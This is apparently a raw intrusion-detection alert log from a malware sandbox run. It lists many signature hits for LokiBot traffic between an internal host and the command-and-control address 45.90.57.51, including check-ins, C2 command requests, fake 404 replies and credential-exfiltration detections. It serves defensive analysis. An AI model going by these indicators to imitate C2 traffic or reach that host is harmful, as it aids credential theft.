Timestamp:	05/16/24-00:38:47.548431
SID:	2025483
Source Port:	80
Destination Port:	49772
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:41.388891
SID:	2024318
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:02.627302
SID:	2825766
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:08.955748
SID:	2025381
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:10.859696
SID:	2024313
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:05.193094
SID:	2024313
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:12.750490
SID:	2025381
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:53.120055
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:41.388891
SID:	2024313
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:09.170149
SID:	2825766
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:59.470457
SID:	2024318
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:20.039736
SID:	2025483
Source Port:	80
Destination Port:	49758
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:03.239293
SID:	2025381
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:56.970973
SID:	2825766
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:10.859696
SID:	2024318
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:25.211849
SID:	2025381
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:33.823352
SID:	2025483
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:57.099162
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:31.431993
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:05.193094
SID:	2024318
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:52.383820
SID:	2825766
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:09.170149
SID:	2021641
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:58.862053
SID:	2025381
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:01.356159
SID:	2021641
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:56.970973
SID:	2021641
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:16.803035
SID:	2024313
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:35.693093
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:18.705946
SID:	2825766
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:29.556038
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:29.556038
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:37.577907
SID:	2825766
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:47.045718
SID:	2024313
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:35.693093
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:39.485062
SID:	2025381
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:16.803035
SID:	2024318
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:47.045718
SID:	2024318
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:20.628600
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:31.431993
SID:	2825766
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:52.000180
SID:	2025381
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:33.315004
SID:	2025381
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:23.333175
SID:	2021641
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:50.123310
SID:	2825766
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:59.470457
SID:	2025381
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:19.541569
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:25.211849
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:17.603710
SID:	2825766
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:31.431993
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:36:55.590961
SID:	2025483
Source Port:	80
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:51.232610
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:36:59.369699
SID:	2025483
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:57.099162
SID:	2024318
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:05.193094
SID:	2025381
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:53.898131
SID:	2825766
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:49.343817
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:57.099162
SID:	2024313
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:30.894418
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:53.898131
SID:	2025381
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:45.530428
SID:	2825766
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:03.750636
SID:	2025483
Source Port:	80
Destination Port:	49749
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:51.736667
SID:	2025483
Source Port:	80
Destination Port:	49743
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:55.510827
SID:	2025483
Source Port:	80
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:59.975323
SID:	2025483
Source Port:	80
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:30.894418
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:23.333175
SID:	2825766
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:02.627302
SID:	2021641
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:23.333175
SID:	2025381
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:14.907253
SID:	2825766
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:52.000180
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:33.315004
SID:	2021641
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:52.000180
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:33.811515
SID:	2825766
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:23.884685
SID:	2024313
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:23.884685
SID:	2024318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:59.470457
SID:	2825766
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:15.699411
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:55.076784
SID:	2825766
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:05.048280
SID:	2025483
Source Port:	80
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:25.750611
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:25.750611
SID:	2825766
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:15.699411
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:49.343817
SID:	2025381
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:08.955748
SID:	2825766
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:07.071740
SID:	2021641
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:39.485062
SID:	2021641
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:43.272420
SID:	2825766
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:14.907253
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:33.811515
SID:	2025381
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:07.254938
SID:	2025381
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:09.462527
SID:	2025483
Source Port:	80
Destination Port:	49752
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:50.123310
SID:	2025381
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:43.272420
SID:	2025381
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:18.705946
SID:	2024313
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:35.696425
SID:	2025483
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:37.577907
SID:	2025381
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:45.647664
SID:	2025483
Source Port:	80
Destination Port:	49771
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:54.389626
SID:	2025483
Source Port:	80
Destination Port:	49775
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:43.623424
SID:	2021641
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:45.530428
SID:	2025381
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:04.537805
SID:	2024318
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:09.676041
SID:	2025483
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:54.264582
SID:	2024317
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:10.859696
SID:	2021641
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:04.537805
SID:	2024313
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:28.165565
SID:	2025483
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:54.264582
SID:	2024312
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:16.216451
SID:	2025483
Source Port:	80
Destination Port:	49756
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:11.067189
SID:	2825766
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:44.125784
SID:	2025483
Source Port:	80
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:12.990169
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:18.705946
SID:	2024318
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:41.744488
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:05.193094
SID:	2825766
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:09.170149
SID:	2024313
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:20.628600
SID:	2825766
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:53.120055
SID:	2825766
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:35.199755
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:01.356159
SID:	2024313
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

